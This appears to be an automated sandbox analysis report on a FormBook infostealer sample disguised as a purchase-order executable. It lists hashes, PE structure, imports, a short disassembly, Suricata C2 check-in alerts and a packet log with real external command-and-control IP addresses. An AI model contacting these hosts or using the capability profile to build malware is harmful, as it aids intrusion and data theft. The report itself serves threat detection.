                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\Desktop\PO-DOC1522025-12.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.992004316494122
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:wdtUn1o7WqxMYos+lD1W9SVIhWkthBbBLiOb0ZXW5AfC:wLUnq7W5L3juxbeC0ZXWaq
                                                                                  MD5:3E64A135723ECC698A54CEEE6717E407
                                                                                  SHA1:9F0DE74CD66047688EF11B154DD0C330270E3565
                                                                                  SHA-256:B2B49C39984193362A73CC5784811F75CF77621157A9E582F0E0840D55872837
                                                                                  SHA-512:01EAC3A2E593553515EA5CF193D6BE54BF9AE8EC569E1DD80D1678F83AACF916D14AD152AB9E06897B9D536AFDDB3360302FBA56FCD98B2A199DFDAF5B05B581
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.....NIL7...Q..f.NJ...f1P...PZRNIL7JN2XBJPPZRNIL7JN2XBJPPZ.NIL9U.<X.C.q.S..mc"'Ax28?7(3#i/V$ ],b(5p(' i%Yj.}.b'?4?|CDF.JN2XBJP)[[.t,P.sR?.w07.H...*).B..l:5.S.rR?..932o...7JN2XBJP..RN.M6J.Z..JPPZRNIL.JL3SCAPPJVNIL7JN2XB.EPZR^IL7jJ2XB.PPJRNIN7JH2XBJPPZTNIL7JN2XbNPPXRNIL7JL2..JP@ZR^IL7J^2XRJPPZRNYL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2v6/($ZRN.C3JN"XBJ@TZR^IL7JN2XBJPPZRNiL7*N2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRNIL7JN2XBJPPZRN
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.436242670234977
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:PO-DOC1522025-12.exe
                                                                                  File size:1'645'568 bytes
                                                                                  MD5:dc2314bb7a5383eb616a78e1f43d4472
                                                                                  SHA1:99cdff011d26e805ce19f8d84c5538181d02db0f
                                                                                  SHA256:d26aea201415a8250f0ef469e579d33056696b102a6ca42ead5a838a29b15ba4
                                                                                  SHA512:214258fbe9fbb97b00e34a70ce3ba6b4cec740c106792774790bc1b461bd91a8f7cc758e6a9ba0871372394ca7e9e1699f5bc597a69f3c24f328c9d746883bd3
                                                                                  SSDEEP:24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8aw89/o+eZv7Ktues+y57d8OfD:KTvC/MTQYxsWR7aw89/o156
                                                                                  TLSH:F675E10273D1C022FFAB96734B5AF6115BBC79260523A61F03A81DB9BD701B1563E7A3
                                                                                  File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                  Entrypoint:0x420577
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6786F31A [Tue Jan 14 23:28:26 2025 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                  Instruction
                                                                                  call 00007F8E00C20003h
                                                                                  jmp 00007F8E00C1F90Fh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  push dword ptr [ebp+08h]
                                                                                  mov esi, ecx
                                                                                  call 00007F8E00C1FAEDh
                                                                                  mov dword ptr [esi], 0049FDF0h
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                  mov eax, ecx
                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                  mov dword ptr [ecx+04h], 0049FDF8h
                                                                                  mov dword ptr [ecx], 0049FDF0h
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  push dword ptr [ebp+08h]
                                                                                  mov esi, ecx
                                                                                  call 00007F8E00C1FABAh
                                                                                  mov dword ptr [esi], 0049FE0Ch
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                  mov eax, ecx
                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                  mov dword ptr [ecx+04h], 0049FE14h
                                                                                  mov dword ptr [ecx], 0049FE0Ch
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  mov esi, ecx
                                                                                  lea eax, dword ptr [esi+04h]
                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                  and dword ptr [eax], 00000000h
                                                                                  and dword ptr [eax+04h], 00000000h
                                                                                  push eax
                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                  add eax, 04h
                                                                                  push eax
                                                                                  call 00007F8E00C226ADh
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                  mov dword ptr [ecx], 0049FDD0h
                                                                                  push eax
                                                                                  call 00007F8E00C226F8h
                                                                                  pop ecx
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  mov esi, ecx
                                                                                  lea eax, dword ptr [esi+04h]
                                                                                  mov dword ptr [esi], 0049FDD0h
                                                                                  push eax
                                                                                  call 00007F8E00C226E1h
                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                  pop ecx
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xbb094.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1900000x7594.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xd40000xbb0940xbb2001d1bda3f97f1a1e68f94a61a3e9e88b8False0.9648881095524382data7.96506205522469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1900000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                  RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                  RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                  RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                  RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                  RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                  RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                  RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                  RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                  RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                  RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                  RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                  RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                  RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                  RT_RCDATA0xdc7b80xb235cdata1.0003164608985846
                                                                                  RT_GROUP_ICON0x18eb140x76dataEnglishGreat Britain0.6610169491525424
                                                                                  RT_GROUP_ICON0x18eb8c0x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0x18eba00x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0x18ebb40x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0x18ebc80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                  RT_MANIFEST0x18eca40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                  DLLImport
                                                                                  WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                  MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                  WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                  USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                  USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                  GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                  SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                  OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishGreat Britain
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2025-01-15T08:28:32.233926+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649864154.215.72.11080TCP
                                                                                  2025-01-15T08:29:04.255471+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649904116.50.37.24480TCP
                                                                                  2025-01-15T08:30:30.972757+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64991085.159.66.9380TCP
                                                                                  2025-01-15T08:30:44.635383+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64991691.195.240.9480TCP
                                                                                  2025-01-15T08:31:06.171460+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64992066.29.149.4680TCP
                                                                                  2025-01-15T08:31:19.801583+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649924195.110.124.13380TCP
                                                                                  2025-01-15T08:31:49.267638+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649929217.196.55.20280TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 15, 2025 08:28:31.328476906 CET4986480192.168.2.6154.215.72.110
                                                                                  Jan 15, 2025 08:28:31.333431005 CET8049864154.215.72.110192.168.2.6
                                                                                  Jan 15, 2025 08:28:31.333528996 CET4986480192.168.2.6154.215.72.110
                                                                                  Jan 15, 2025 08:28:31.336708069 CET4986480192.168.2.6154.215.72.110
                                                                                  Jan 15, 2025 08:28:31.341540098 CET8049864154.215.72.110192.168.2.6
                                                                                  Jan 15, 2025 08:28:32.233675003 CET8049864154.215.72.110192.168.2.6
                                                                                  Jan 15, 2025 08:28:32.233706951 CET8049864154.215.72.110192.168.2.6
                                                                                  Jan 15, 2025 08:28:32.233926058 CET4986480192.168.2.6154.215.72.110
                                                                                  Jan 15, 2025 08:28:32.237561941 CET4986480192.168.2.6154.215.72.110
                                                                                  Jan 15, 2025 08:28:32.242440939 CET8049864154.215.72.110192.168.2.6
                                                                                  Jan 15, 2025 08:28:55.764158010 CET4990180192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:55.768939972 CET8049901116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:55.769026995 CET4990180192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:55.770737886 CET4990180192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:55.775566101 CET8049901116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:56.643721104 CET8049901116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:56.643753052 CET8049901116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:56.643940926 CET4990180192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:57.271843910 CET4990180192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:58.290234089 CET4990280192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:58.295403004 CET8049902116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:58.295532942 CET4990280192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:58.297305107 CET4990280192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:58.302144051 CET8049902116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:59.185817003 CET8049902116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:59.185879946 CET8049902116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:28:59.185982943 CET4990280192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:28:59.803208113 CET4990280192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:00.832079887 CET4990380192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:00.837243080 CET8049903116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:00.837414026 CET4990380192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:00.839031935 CET4990380192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:00.843949080 CET8049903116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:00.843991041 CET8049903116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:01.717227936 CET8049903116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:01.717381954 CET8049903116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:01.717508078 CET4990380192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:02.350244045 CET4990380192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:03.368438005 CET4990480192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:03.373578072 CET8049904116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:03.373718977 CET4990480192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:03.375433922 CET4990480192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:03.380285978 CET8049904116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:04.255281925 CET8049904116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:04.255352020 CET8049904116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:04.255470991 CET4990480192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:04.259481907 CET4990480192.168.2.6116.50.37.244
                                                                                  Jan 15, 2025 08:29:04.264288902 CET8049904116.50.37.244192.168.2.6
                                                                                  Jan 15, 2025 08:29:22.655019999 CET4990780192.168.2.685.159.66.93
                                                                                  Jan 15, 2025 08:29:22.659879923 CET804990785.159.66.93192.168.2.6
                                                                                  Jan 15, 2025 08:29:22.660012960 CET4990780192.168.2.685.159.66.93
